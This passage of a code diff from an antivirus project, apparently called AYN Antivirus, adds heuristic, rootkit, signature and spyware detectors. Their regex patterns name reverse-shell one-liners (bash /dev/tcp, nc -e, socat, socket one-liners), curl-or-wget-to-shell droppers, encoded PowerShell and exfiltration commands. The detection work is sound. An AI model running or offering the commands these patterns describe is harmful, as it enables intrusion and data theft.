rb"\b(?:os\.system|subprocess\.(?:call|run|Popen)|commands\.getoutput)\s*\(",
re.IGNORECASE,
)
_RE_REVERSE_SHELL = re.compile(
rb"(?:/dev/tcp/|bash\s+-i\s+>&|nc\s+-[elp]|ncat\s+-|socat\s+|python[23]?\s+-c\s+['\"]import\s+socket)",
re.IGNORECASE,
)
_RE_WGET_CURL_PIPE = re.compile(
rb"(?:wget|curl)\s+[^\n]*\|\s*(?:sh|bash|python|perl)", re.IGNORECASE
)
_RE_ENCODED_PS = re.compile(
rb"-(?:enc(?:odedcommand)?|e|ec)\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE
)
_RE_CHR_CHAIN = re.compile(
rb"(?:chr\s*\(\s*\d+\s*\)\s*[\.\+]\s*){" + str(_CHR_CHAIN_MIN).encode() + rb",}",
re.IGNORECASE,
)
_RE_HEX_STRING = re.compile(
rb"(?:\\x[0-9a-fA-F]{2}){8,}"
)
_RE_STRING_CONCAT = re.compile(
rb"""(?:["'][^"']{1,4}["']\s*[\+\.]\s*){6,}""",
)
# UPX magic at the beginning of packed sections.
_UPX_MAGIC = b"UPX!"
# System directories where world-writable or SUID files are suspicious.
_SYSTEM_DIRS = {"/usr/bin", "/usr/sbin", "/bin", "/sbin", "/usr/local/bin", "/usr/local/sbin"}
# Locations where hidden files are suspicious.
_SUSPICIOUS_HIDDEN_DIRS = {"/tmp", "/var/tmp", "/dev/shm", "/var/www", "/srv"}
class HeuristicDetector(BaseDetector):
"""Flag files that exhibit suspicious characteristics without a known signature."""
# ------------------------------------------------------------------
# BaseDetector interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "heuristic_detector"
@property
def description(self) -> str:
return "Statistical and pattern-based heuristic analysis"
def detect(
self,
file_path: str | Path,
file_content: Optional[bytes] = None,
file_hash: Optional[str] = None,
) -> List[DetectionResult]:
file_path = Path(file_path)
results: List[DetectionResult] = []
try:
content = self._read_content(file_path, file_content)
except OSError as exc:
self._warn("Cannot read %s: %s", file_path, exc)
return results
# --- Entropy analysis ---
results.extend(self._check_entropy(file_path, content))
# --- Suspicious string patterns ---
results.extend(self._check_suspicious_strings(file_path, content))
# --- Obfuscation indicators ---
results.extend(self._check_obfuscation(file_path, content))
# --- ELF anomalies ---
results.extend(self._check_elf_anomalies(file_path, content))
# --- Permission / location anomalies ---
results.extend(self._check_permission_anomalies(file_path))
# --- Hidden files in suspicious locations ---
results.extend(self._check_hidden_files(file_path))
# --- Recently modified system files ---
results.extend(self._check_recent_system_modification(file_path))
return results
# ------------------------------------------------------------------
# Entropy
# ------------------------------------------------------------------
@staticmethod
def calculate_entropy(data: bytes) -> float:
"""Calculate Shannon entropy (bits per byte) of *data*.
Returns a value between 0.0 (uniform) and 8.0 (maximum randomness).
"""
if not data:
return 0.0
length = len(data)
freq = Counter(data)
entropy = 0.0
for count in freq.values():
p = count / length
if p > 0:
entropy -= p * math.log2(p)
return entropy
def _check_entropy(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
if len(content) < 256:
return results # too short for meaningful entropy
entropy = self.calculate_entropy(content)
if entropy > _HIGH_ENTROPY_THRESHOLD:
results.append(DetectionResult(
threat_name="Heuristic.Packed.HighEntropy",
threat_type="MALWARE",
severity="MEDIUM",
confidence=65,
details=(
f"File entropy {entropy:.2f} bits/byte exceeds threshold "
f"({_HIGH_ENTROPY_THRESHOLD}) — likely packed or encrypted"
),
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Suspicious strings
# ------------------------------------------------------------------
def _check_suspicious_strings(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
# Base64-encoded payloads.
b64_blobs = _RE_BASE64_BLOB.findall(content)
long_blobs = [b for b in b64_blobs if len(b) >= _B64_MIN_LENGTH]
if long_blobs:
results.append(DetectionResult(
threat_name="Heuristic.Obfuscation.Base64Payload",
threat_type="MALWARE",
severity="MEDIUM",
confidence=55,
details=f"Found {len(long_blobs)} large base64-encoded blob(s)",
detector_name=self.name,
))
# eval / exec / compile calls.
if _RE_EVAL_EXEC.search(content):
results.append(DetectionResult(
threat_name="Heuristic.Suspicious.DynamicExecution",
threat_type="MALWARE",
severity="MEDIUM",
confidence=50,
details="File uses eval()/exec()/compile() — possible code injection",
detector_name=self.name,
))
# os.system / subprocess calls.
if _RE_SYSTEM_CALL.search(content):
results.append(DetectionResult(
threat_name="Heuristic.Suspicious.SystemCall",
threat_type="MALWARE",
severity="MEDIUM",
confidence=45,
details="File invokes system commands via os.system/subprocess",
detector_name=self.name,
))
# Reverse shell patterns.
match = _RE_REVERSE_SHELL.search(content)
if match:
results.append(DetectionResult(
threat_name="Heuristic.ReverseShell",
threat_type="MALWARE",
severity="CRITICAL",
confidence=85,
details=f"Reverse shell pattern detected: {match.group()[:80]!r}",
detector_name=self.name,
))
# wget/curl piped to sh/bash.
if _RE_WGET_CURL_PIPE.search(content):
results.append(DetectionResult(
threat_name="Heuristic.Dropper.PipeToShell",
threat_type="MALWARE",
severity="HIGH",
confidence=80,
details="File downloads and pipes directly to a shell interpreter",
detector_name=self.name,
))
# Encoded PowerShell command.
if _RE_ENCODED_PS.search(content):
results.append(DetectionResult(
threat_name="Heuristic.PowerShell.EncodedCommand",
threat_type="MALWARE",
severity="HIGH",
confidence=75,
details="Encoded PowerShell command detected",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Obfuscation
# ------------------------------------------------------------------
def _check_obfuscation(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
# chr() chains.
if _RE_CHR_CHAIN.search(content):
results.append(DetectionResult(
threat_name="Heuristic.Obfuscation.ChrChain",
threat_type="MALWARE",
severity="MEDIUM",
confidence=60,
details="Obfuscation via long chr() concatenation chain",
detector_name=self.name,
))
# Hex-encoded byte strings.
hex_matches = _RE_HEX_STRING.findall(content)
if len(hex_matches) > 3:
results.append(DetectionResult(
threat_name="Heuristic.Obfuscation.HexStrings",
threat_type="MALWARE",
severity="MEDIUM",
confidence=55,
details=f"Multiple hex-encoded strings detected ({len(hex_matches)} occurrences)",
detector_name=self.name,
))
# Excessive string concatenation.
if _RE_STRING_CONCAT.search(content):
results.append(DetectionResult(
threat_name="Heuristic.Obfuscation.StringConcat",
threat_type="MALWARE",
severity="LOW",
confidence=40,
details="Excessive short-string concatenation — possible obfuscation",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# ELF anomalies
# ------------------------------------------------------------------
def _check_elf_anomalies(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
if not content[:4] == b"\x7fELF":
return results
# UPX packed.
if _UPX_MAGIC in content[:4096]:
results.append(DetectionResult(
threat_name="Heuristic.Packed.UPX",
threat_type="MALWARE",
severity="MEDIUM",
confidence=60,
details="ELF binary is UPX-packed",
detector_name=self.name,
))
# Stripped binary in unusual location.
path_str = str(file_path)
is_in_system = any(path_str.startswith(d) for d in _SYSTEM_DIRS)
if not is_in_system:
# Non-system ELF — more suspicious if stripped (no .symtab).
if b".symtab" not in content and b".debug" not in content:
results.append(DetectionResult(
threat_name="Heuristic.ELF.StrippedNonSystem",
threat_type="MALWARE",
severity="LOW",
confidence=35,
details="Stripped ELF binary found outside standard system directories",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Permission anomalies
# ------------------------------------------------------------------
def _check_permission_anomalies(
self, file_path: Path
) -> List[DetectionResult]:
results: List[DetectionResult] = []
try:
st = file_path.stat()
except OSError:
return results
mode = st.st_mode
path_str = str(file_path)
# World-writable file in a system directory.
is_in_system = any(path_str.startswith(d) for d in _SYSTEM_DIRS)
if is_in_system and (mode & stat.S_IWOTH):
results.append(DetectionResult(
threat_name="Heuristic.Permissions.WorldWritableSystem",
threat_type="MALWARE",
severity="HIGH",
confidence=70,
details=f"World-writable file in system directory: {file_path}",
detector_name=self.name,
))
# SUID/SGID on unusual files.
is_suid = bool(mode & stat.S_ISUID)
is_sgid = bool(mode & stat.S_ISGID)
if (is_suid or is_sgid) and not is_in_system:
flag = "SUID" if is_suid else "SGID"
results.append(DetectionResult(
threat_name=f"Heuristic.Permissions.{flag}NonSystem",
threat_type="MALWARE",
severity="HIGH",
confidence=75,
details=f"{flag} bit set on file outside system directories: {file_path}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Hidden files in suspicious locations
# ------------------------------------------------------------------
def _check_hidden_files(
self, file_path: Path
) -> List[DetectionResult]:
results: List[DetectionResult] = []
if not file_path.name.startswith("."):
return results
path_str = str(file_path)
for sus_dir in _SUSPICIOUS_HIDDEN_DIRS:
if path_str.startswith(sus_dir):
results.append(DetectionResult(
threat_name="Heuristic.HiddenFile.SuspiciousLocation",
threat_type="MALWARE",
severity="MEDIUM",
confidence=50,
details=f"Hidden file in suspicious directory: {file_path}",
detector_name=self.name,
))
break
return results
# ------------------------------------------------------------------
# Recently modified system files
# ------------------------------------------------------------------
def _check_recent_system_modification(
self, file_path: Path
) -> List[DetectionResult]:
results: List[DetectionResult] = []
path_str = str(file_path)
is_in_system = any(path_str.startswith(d) for d in _SYSTEM_DIRS)
if not is_in_system:
return results
try:
mtime = datetime.utcfromtimestamp(file_path.stat().st_mtime)
except OSError:
return results
if datetime.utcnow() - mtime < timedelta(hours=24):
results.append(DetectionResult(
threat_name="Heuristic.SystemFile.RecentlyModified",
threat_type="MALWARE",
severity="MEDIUM",
confidence=45,
details=(
f"System file modified within the last 24 hours: "
f"{file_path} (mtime: {mtime.isoformat()})"
),
detector_name=self.name,
))
return results

View File

@@ -0,0 +1,387 @@
"""Rootkit detector for AYN Antivirus.
Performs system-wide checks for indicators of rootkit compromise: known
rootkit files, modified system binaries, hidden processes, hidden kernel
modules, LD_PRELOAD hijacking, hidden network ports, and tampered logs.
Many checks require **root** privileges. On non-Linux systems, kernel-
module and /proc-based checks are gracefully skipped.
"""
from __future__ import annotations
import logging
import os
import subprocess
from pathlib import Path
from typing import List, Optional, Set
import psutil
from ayn_antivirus.constants import (
KNOWN_ROOTKIT_FILES,
MALICIOUS_ENV_VARS,
)
from ayn_antivirus.detectors.base import BaseDetector, DetectionResult
logger = logging.getLogger(__name__)
class RootkitDetector(BaseDetector):
"""System-wide rootkit detection.
Unlike other detectors, the *file_path* argument is optional. When
called without a path (or with ``file_path=None``) the detector runs
every host-level check. When given a file it limits itself to checks
relevant to that file.
"""
# ------------------------------------------------------------------
# BaseDetector interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "rootkit_detector"
@property
def description(self) -> str:
return "Detects rootkits via file, process, module, and environment analysis"
def detect(
self,
file_path: str | Path | None = None,
file_content: Optional[bytes] = None,
file_hash: Optional[str] = None,
) -> List[DetectionResult]:
"""Run rootkit checks.
If *file_path* is ``None``, all system-wide checks are executed.
Otherwise only file-specific checks run.
"""
results: List[DetectionResult] = []
if file_path is not None:
fp = Path(file_path)
# File-specific: is this a known rootkit artefact?
results.extend(self._check_known_rootkit_file(fp))
return results
# --- Full system-wide scan ---
results.extend(self._check_known_rootkit_files())
results.extend(self._check_ld_preload())
results.extend(self._check_ld_so_preload())
results.extend(self._check_hidden_processes())
results.extend(self._check_hidden_kernel_modules())
results.extend(self._check_hidden_network_ports())
results.extend(self._check_malicious_env_vars())
results.extend(self._check_tampered_logs())
return results
# ------------------------------------------------------------------
# Known rootkit files
# ------------------------------------------------------------------
def _check_known_rootkit_files(self) -> List[DetectionResult]:
"""Check every path in :pydata:`KNOWN_ROOTKIT_FILES`."""
results: List[DetectionResult] = []
for path_str in KNOWN_ROOTKIT_FILES:
p = Path(path_str)
if p.exists():
results.append(DetectionResult(
threat_name="Rootkit.KnownFile",
threat_type="ROOTKIT",
severity="CRITICAL",
confidence=90,
details=f"Known rootkit artefact present: {path_str}",
detector_name=self.name,
))
return results
def _check_known_rootkit_file(self, file_path: Path) -> List[DetectionResult]:
"""Check whether *file_path* is a known rootkit file."""
results: List[DetectionResult] = []
path_str = str(file_path)
if path_str in KNOWN_ROOTKIT_FILES:
results.append(DetectionResult(
threat_name="Rootkit.KnownFile",
threat_type="ROOTKIT",
severity="CRITICAL",
confidence=90,
details=f"Known rootkit artefact: {path_str}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# LD_PRELOAD / ld.so.preload
# ------------------------------------------------------------------
def _check_ld_preload(self) -> List[DetectionResult]:
"""Flag the ``LD_PRELOAD`` environment variable if set globally."""
results: List[DetectionResult] = []
val = os.environ.get("LD_PRELOAD", "")
if val:
results.append(DetectionResult(
threat_name="Rootkit.LDPreload.EnvVar",
threat_type="ROOTKIT",
severity="CRITICAL",
confidence=85,
details=f"LD_PRELOAD is set: {val}",
detector_name=self.name,
))
return results
def _check_ld_so_preload(self) -> List[DetectionResult]:
"""Check ``/etc/ld.so.preload`` for suspicious entries."""
results: List[DetectionResult] = []
ld_preload_file = Path("/etc/ld.so.preload")
if not ld_preload_file.exists():
return results
try:
content = ld_preload_file.read_text().strip()
except PermissionError:
self._warn("Cannot read /etc/ld.so.preload")
return results
if content:
lines = [l.strip() for l in content.splitlines() if l.strip() and not l.startswith("#")]
if lines:
results.append(DetectionResult(
threat_name="Rootkit.LDPreload.File",
threat_type="ROOTKIT",
severity="CRITICAL",
confidence=85,
details=f"/etc/ld.so.preload contains entries: {', '.join(lines[:5])}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Hidden processes
# ------------------------------------------------------------------
def _check_hidden_processes(self) -> List[DetectionResult]:
"""Compare /proc PIDs with psutil to find hidden processes."""
results: List[DetectionResult] = []
proc_dir = Path("/proc")
if not proc_dir.is_dir():
return results # non-Linux
proc_pids: Set[int] = set()
try:
for entry in proc_dir.iterdir():
if entry.name.isdigit():
proc_pids.add(int(entry.name))
except PermissionError:
return results
psutil_pids = set(psutil.pids())
hidden = proc_pids - psutil_pids
for pid in hidden:
name = ""
try:
comm = proc_dir / str(pid) / "comm"
if comm.exists():
name = comm.read_text().strip()
except OSError:
pass
results.append(DetectionResult(
threat_name="Rootkit.HiddenProcess",
threat_type="ROOTKIT",
severity="CRITICAL",
confidence=85,
details=f"PID {pid} ({name or 'unknown'}) visible in /proc but hidden from psutil",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Hidden kernel modules
# ------------------------------------------------------------------
def _check_hidden_kernel_modules(self) -> List[DetectionResult]:
"""Compare ``lsmod`` output with ``/proc/modules`` to find discrepancies."""
results: List[DetectionResult] = []
proc_modules_path = Path("/proc/modules")
if not proc_modules_path.exists():
return results # non-Linux
# Modules from /proc/modules.
try:
proc_content = proc_modules_path.read_text()
except PermissionError:
return results
proc_mods: Set[str] = set()
for line in proc_content.splitlines():
parts = line.split()
if parts:
proc_mods.add(parts[0])
# Modules from lsmod.
lsmod_mods: Set[str] = set()
try:
output = subprocess.check_output(["lsmod"], stderr=subprocess.DEVNULL, timeout=10)
for line in output.decode(errors="replace").splitlines()[1:]:
parts = line.split()
if parts:
lsmod_mods.add(parts[0])
except (FileNotFoundError, subprocess.SubprocessError, OSError):
return results # lsmod not available
# Modules in /proc but NOT in lsmod → hidden from userspace.
hidden = proc_mods - lsmod_mods
for mod in hidden:
results.append(DetectionResult(
threat_name="Rootkit.HiddenKernelModule",
threat_type="ROOTKIT",
severity="CRITICAL",
confidence=80,
details=f"Kernel module '{mod}' in /proc/modules but hidden from lsmod",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Hidden network ports
# ------------------------------------------------------------------
def _check_hidden_network_ports(self) -> List[DetectionResult]:
"""Compare ``ss``/``netstat`` listening ports with psutil."""
results: List[DetectionResult] = []
# Ports from psutil.
psutil_ports: Set[int] = set()
try:
for conn in psutil.net_connections(kind="inet"):
if conn.status == "LISTEN" and conn.laddr:
psutil_ports.add(conn.laddr.port)
except psutil.AccessDenied:
return results
# Ports from ss.
ss_ports: Set[int] = set()
try:
output = subprocess.check_output(
["ss", "-tlnH"], stderr=subprocess.DEVNULL, timeout=10
)
for line in output.decode(errors="replace").splitlines():
# Typical ss output: LISTEN 0 128 0.0.0.0:22 ...
parts = line.split()
for part in parts:
if ":" in part:
try:
port = int(part.rsplit(":", 1)[1])
ss_ports.add(port)
except (ValueError, IndexError):
continue
except (FileNotFoundError, subprocess.SubprocessError, OSError):
return results # ss not available
# Ports in ss but not in psutil → potentially hidden by a rootkit.
hidden = ss_ports - psutil_ports
for port in hidden:
results.append(DetectionResult(
threat_name="Rootkit.HiddenPort",
threat_type="ROOTKIT",
severity="HIGH",
confidence=70,
details=f"Listening port {port} visible to ss but hidden from psutil",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Malicious environment variables
# ------------------------------------------------------------------
def _check_malicious_env_vars(self) -> List[DetectionResult]:
"""Check the current environment for known-risky variables."""
results: List[DetectionResult] = []
for entry in MALICIOUS_ENV_VARS:
if "=" in entry:
# Exact key=value match (e.g. "HISTFILE=/dev/null").
key, val = entry.split("=", 1)
if os.environ.get(key) == val:
results.append(DetectionResult(
threat_name="Rootkit.EnvVar.Suspicious",
threat_type="ROOTKIT",
severity="HIGH",
confidence=75,
details=f"Suspicious environment variable: {key}={val}",
detector_name=self.name,
))
else:
# Key presence check (e.g. "LD_PRELOAD").
if entry in os.environ:
results.append(DetectionResult(
threat_name="Rootkit.EnvVar.Suspicious",
threat_type="ROOTKIT",
severity="HIGH",
confidence=65,
details=f"Suspicious environment variable set: {entry}={os.environ[entry][:100]}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Tampered log files
# ------------------------------------------------------------------
_LOG_PATHS = [
"/var/log/auth.log",
"/var/log/syslog",
"/var/log/messages",
"/var/log/secure",
"/var/log/wtmp",
"/var/log/btmp",
"/var/log/lastlog",
]
def _check_tampered_logs(self) -> List[DetectionResult]:
"""Look for signs of log tampering: zero-byte logs, missing logs,
or logs whose mtime is suspiciously older than expected.
"""
results: List[DetectionResult] = []
for log_path_str in self._LOG_PATHS:
log_path = Path(log_path_str)
if not log_path.exists():
# Missing critical log.
if log_path_str in ("/var/log/auth.log", "/var/log/syslog", "/var/log/wtmp"):
results.append(DetectionResult(
threat_name="Rootkit.Log.Missing",
threat_type="ROOTKIT",
severity="HIGH",
confidence=60,
details=f"Critical log file missing: {log_path_str}",
detector_name=self.name,
))
continue
try:
st = log_path.stat()
except OSError:
continue
# Zero-byte log file (may have been truncated).
if st.st_size == 0:
results.append(DetectionResult(
threat_name="Rootkit.Log.Truncated",
threat_type="ROOTKIT",
severity="HIGH",
confidence=70,
details=f"Log file is empty (possibly truncated): {log_path_str}",
detector_name=self.name,
))
return results

View File

@@ -0,0 +1,192 @@
"""AYN Antivirus — Signature-based Detector.
Looks up file hashes against the threat signature database populated by
the feed update pipeline (MalwareBazaar, ThreatFox, etc.). Uses
:class:`~ayn_antivirus.signatures.db.hash_db.HashDatabase` so that
definitions written by ``ayn-antivirus update`` are immediately available
for detection.
"""
from __future__ import annotations
import logging
from pathlib import Path
from typing import Dict, List, Optional
from ayn_antivirus.constants import DEFAULT_DB_PATH
from ayn_antivirus.detectors.base import BaseDetector, DetectionResult
from ayn_antivirus.utils.helpers import hash_file as _hash_file_util
logger = logging.getLogger("ayn_antivirus.detectors.signature")
_VALID_SEVERITIES = {"CRITICAL", "HIGH", "MEDIUM", "LOW"}
class SignatureDetector(BaseDetector):
"""Detect known malware by matching file hashes against the signature DB.
Parameters
----------
db_path:
Path to the shared SQLite database that holds the ``threats``,
``ioc_ips``, ``ioc_domains``, and ``ioc_urls`` tables.
"""
def __init__(self, db_path: str | Path = DEFAULT_DB_PATH) -> None:
self.db_path = str(db_path)
self._hash_db = None
self._ioc_db = None
self._loaded = False
# ------------------------------------------------------------------
# BaseDetector interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "signature_detector"
@property
def description(self) -> str:
return "Hash-based signature detection using threat intelligence feeds"
def detect(
self,
file_path: str | Path,
file_content: Optional[bytes] = None,
file_hash: Optional[str] = None,
) -> List[DetectionResult]:
"""Check the file's hash against the ``threats`` table.
If *file_hash* is not supplied it is computed on the fly.
"""
self._ensure_loaded()
results: List[DetectionResult] = []
if not self._hash_db:
return results
# Compute hash if not provided.
if not file_hash:
try:
file_hash = _hash_file_util(str(file_path), algo="sha256")
except Exception:
return results
# Also compute MD5 for VirusShare lookups.
md5_hash = None
try:
md5_hash = _hash_file_util(str(file_path), algo="md5")
except Exception:
pass
# Look up SHA256 first, then MD5.
threat = self._hash_db.lookup(file_hash)
if not threat and md5_hash:
threat = self._hash_db.lookup(md5_hash)
if threat:
severity = (threat.get("severity") or "HIGH").upper()
if severity not in _VALID_SEVERITIES:
severity = "HIGH"
results.append(DetectionResult(
threat_name=threat.get("threat_name", "Malware.Known"),
threat_type=threat.get("threat_type", "MALWARE"),
severity=severity,
confidence=100,
details=(
f"Known threat signature match "
f"(source: {threat.get('source', 'unknown')}). "
f"Hash: {file_hash[:16]}... "
f"Details: {threat.get('details', '')}"
),
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# IOC lookup helpers (used by engine for network enrichment)
# ------------------------------------------------------------------
def lookup_hash(self, file_hash: str) -> Optional[Dict]:
"""Look up a single hash. Returns threat info dict or ``None``."""
self._ensure_loaded()
if not self._hash_db:
return None
return self._hash_db.lookup(file_hash)
def lookup_ip(self, ip: str) -> Optional[Dict]:
"""Look up an IP against the IOC database."""
self._ensure_loaded()
if not self._ioc_db:
return None
return self._ioc_db.lookup_ip(ip)
def lookup_domain(self, domain: str) -> Optional[Dict]:
"""Look up a domain against the IOC database."""
self._ensure_loaded()
if not self._ioc_db:
return None
return self._ioc_db.lookup_domain(domain)
# ------------------------------------------------------------------
# Statistics
# ------------------------------------------------------------------
def get_stats(self) -> Dict:
"""Return signature / IOC database statistics."""
self._ensure_loaded()
stats: Dict = {"hash_count": 0, "loaded": self._loaded}
if self._hash_db:
stats["hash_count"] = self._hash_db.count()
stats.update(self._hash_db.get_stats())
if self._ioc_db:
stats["ioc_ips"] = len(self._ioc_db.get_all_malicious_ips())
stats["ioc_domains"] = len(self._ioc_db.get_all_malicious_domains())
return stats
@property
def signature_count(self) -> int:
"""Number of hash signatures currently loaded."""
self._ensure_loaded()
return self._hash_db.count() if self._hash_db else 0
# ------------------------------------------------------------------
# Lifecycle
# ------------------------------------------------------------------
def close(self) -> None:
"""Close database connections."""
if self._hash_db:
self._hash_db.close()
self._hash_db = None
if self._ioc_db:
self._ioc_db.close()
self._ioc_db = None
self._loaded = False
# ------------------------------------------------------------------
# Internal
# ------------------------------------------------------------------
def _ensure_loaded(self) -> None:
"""Lazy-load the database connections on first use."""
if self._loaded:
return
if not self.db_path:
logger.warning("No signature DB path configured")
self._loaded = True
return
try:
from ayn_antivirus.signatures.db.hash_db import HashDatabase
from ayn_antivirus.signatures.db.ioc_db import IOCDatabase
self._hash_db = HashDatabase(self.db_path)
self._hash_db.initialize()
self._ioc_db = IOCDatabase(self.db_path)
self._ioc_db.initialize()
count = self._hash_db.count()
logger.info("Signature DB loaded: %d hash signatures", count)
except Exception as exc:
logger.error("Failed to load signature DB: %s", exc)
self._loaded = True

View File

@@ -0,0 +1,366 @@
"""Spyware detector for AYN Antivirus.
Scans files and system state for indicators of spyware: keyloggers, screen
capture utilities, data exfiltration patterns, reverse shells, unauthorized
SSH keys, and suspicious shell-profile modifications.
"""
from __future__ import annotations
import re
from pathlib import Path
from typing import List, Optional
from ayn_antivirus.constants import SUSPICIOUS_CRON_PATTERNS
from ayn_antivirus.detectors.base import BaseDetector, DetectionResult
# ---------------------------------------------------------------------------
# File-content patterns
# ---------------------------------------------------------------------------
# Keylogger indicators.
_RE_KEYLOGGER = re.compile(
rb"(?:"
rb"/dev/input/event\d+"
rb"|xinput\s+(?:test|list)"
rb"|xdotool\b"
rb"|showkey\b"
rb"|logkeys\b"
rb"|pynput\.keyboard"
rb"|keyboard\.on_press"
rb"|evdev\.InputDevice"
rb"|GetAsyncKeyState"
rb"|SetWindowsHookEx"
rb")",
re.IGNORECASE,
)
# Screen / audio capture.
_RE_SCREEN_CAPTURE = re.compile(
rb"(?:"
rb"scrot\b"
rb"|import\s+-window\s+root"
rb"|xwd\b"
rb"|ffmpeg\s+.*-f\s+x11grab"
rb"|xdpyinfo"
rb"|ImageGrab\.grab"
rb"|screenshot"
rb"|pyautogui\.screenshot"
rb"|screencapture\b"
rb")",
re.IGNORECASE,
)
_RE_AUDIO_CAPTURE = re.compile(
rb"(?:"
rb"arecord\b"
rb"|parecord\b"
rb"|ffmpeg\s+.*-f\s+(?:alsa|pulse|avfoundation)"
rb"|pyaudio"
rb"|sounddevice"
rb")",
re.IGNORECASE,
)
# Data exfiltration.
_RE_EXFIL = re.compile(
rb"(?:"
rb"curl\s+.*-[FdT]\s"
rb"|curl\s+.*--upload-file"
rb"|wget\s+.*--post-file"
rb"|scp\s+.*@"
rb"|rsync\s+.*@"
rb"|nc\s+-[^\s]*\s+\d+\s*<"
rb"|python[23]?\s+-m\s+http\.server"
rb")",
re.IGNORECASE,
)
# Reverse shell.
_RE_REVERSE_SHELL = re.compile(
rb"(?:"
rb"bash\s+-i\s+>&\s*/dev/tcp/"
rb"|nc\s+-e\s+/bin/"
rb"|ncat\s+.*-e\s+/bin/"
rb"|socat\s+exec:"
rb"|python[23]?\s+-c\s+['\"]import\s+socket"
rb"|perl\s+-e\s+['\"]use\s+Socket"
rb"|ruby\s+-rsocket\s+-e"
rb"|php\s+-r\s+['\"].*fsockopen"
rb"|mkfifo\s+/tmp/.*;\s*nc"
rb"|/dev/tcp/\d+\.\d+\.\d+\.\d+"
rb")",
re.IGNORECASE,
)
# Suspicious cron patterns (compiled from constants).
_RE_CRON_PATTERNS = [
re.compile(pat.encode(), re.IGNORECASE) for pat in SUSPICIOUS_CRON_PATTERNS
]
class SpywareDetector(BaseDetector):
"""Detect spyware indicators in files and on the host."""
# ------------------------------------------------------------------
# BaseDetector interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "spyware_detector"
@property
def description(self) -> str:
return "Detects keyloggers, screen capture, data exfiltration, and reverse shells"
def detect(
self,
file_path: str | Path,
file_content: Optional[bytes] = None,
file_hash: Optional[str] = None,
) -> List[DetectionResult]:
file_path = Path(file_path)
results: List[DetectionResult] = []
try:
content = self._read_content(file_path, file_content)
except OSError as exc:
self._warn("Cannot read %s: %s", file_path, exc)
return results
# --- File-content checks ---
results.extend(self._check_keylogger(file_path, content))
results.extend(self._check_screen_capture(file_path, content))
results.extend(self._check_audio_capture(file_path, content))
results.extend(self._check_exfiltration(file_path, content))
results.extend(self._check_reverse_shell(file_path, content))
results.extend(self._check_hidden_cron(file_path, content))
# --- Host-state checks (only for relevant paths) ---
results.extend(self._check_authorized_keys(file_path, content))
results.extend(self._check_shell_profile(file_path, content))
return results
# ------------------------------------------------------------------
# Keylogger patterns
# ------------------------------------------------------------------
def _check_keylogger(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
matches = _RE_KEYLOGGER.findall(content)
if matches:
samples = sorted(set(m.decode(errors="replace") for m in matches[:5]))
results.append(DetectionResult(
threat_name="Spyware.Keylogger",
threat_type="SPYWARE",
severity="CRITICAL",
confidence=80,
details=f"Keylogger indicators: {', '.join(samples)}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Screen capture
# ------------------------------------------------------------------
def _check_screen_capture(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
if _RE_SCREEN_CAPTURE.search(content):
results.append(DetectionResult(
threat_name="Spyware.ScreenCapture",
threat_type="SPYWARE",
severity="HIGH",
confidence=70,
details="Screen-capture tools or API calls detected",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Audio capture
# ------------------------------------------------------------------
def _check_audio_capture(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
if _RE_AUDIO_CAPTURE.search(content):
results.append(DetectionResult(
threat_name="Spyware.AudioCapture",
threat_type="SPYWARE",
severity="HIGH",
confidence=65,
details="Audio recording tools or API calls detected",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Data exfiltration
# ------------------------------------------------------------------
def _check_exfiltration(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
matches = _RE_EXFIL.findall(content)
if matches:
samples = [m.decode(errors="replace")[:80] for m in matches[:3]]
results.append(DetectionResult(
threat_name="Spyware.DataExfiltration",
threat_type="SPYWARE",
severity="HIGH",
confidence=70,
details=f"Data exfiltration pattern(s): {'; '.join(samples)}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Reverse shell
# ------------------------------------------------------------------
def _check_reverse_shell(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
match = _RE_REVERSE_SHELL.search(content)
if match:
results.append(DetectionResult(
threat_name="Spyware.ReverseShell",
threat_type="SPYWARE",
severity="CRITICAL",
confidence=90,
details=f"Reverse shell pattern: {match.group()[:100]!r}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Hidden cron jobs
# ------------------------------------------------------------------
def _check_hidden_cron(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
# Only check cron-related files.
path_str = str(file_path)
is_cron = any(tok in path_str for tok in ("cron", "crontab", "/var/spool/"))
if not is_cron:
return results
for pat in _RE_CRON_PATTERNS:
match = pat.search(content)
if match:
results.append(DetectionResult(
threat_name="Spyware.Cron.SuspiciousEntry",
threat_type="SPYWARE",
severity="HIGH",
confidence=80,
details=f"Suspicious cron pattern in {file_path}: {match.group()[:80]!r}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Unauthorized SSH keys
# ------------------------------------------------------------------
def _check_authorized_keys(
self, file_path: Path, content: bytes
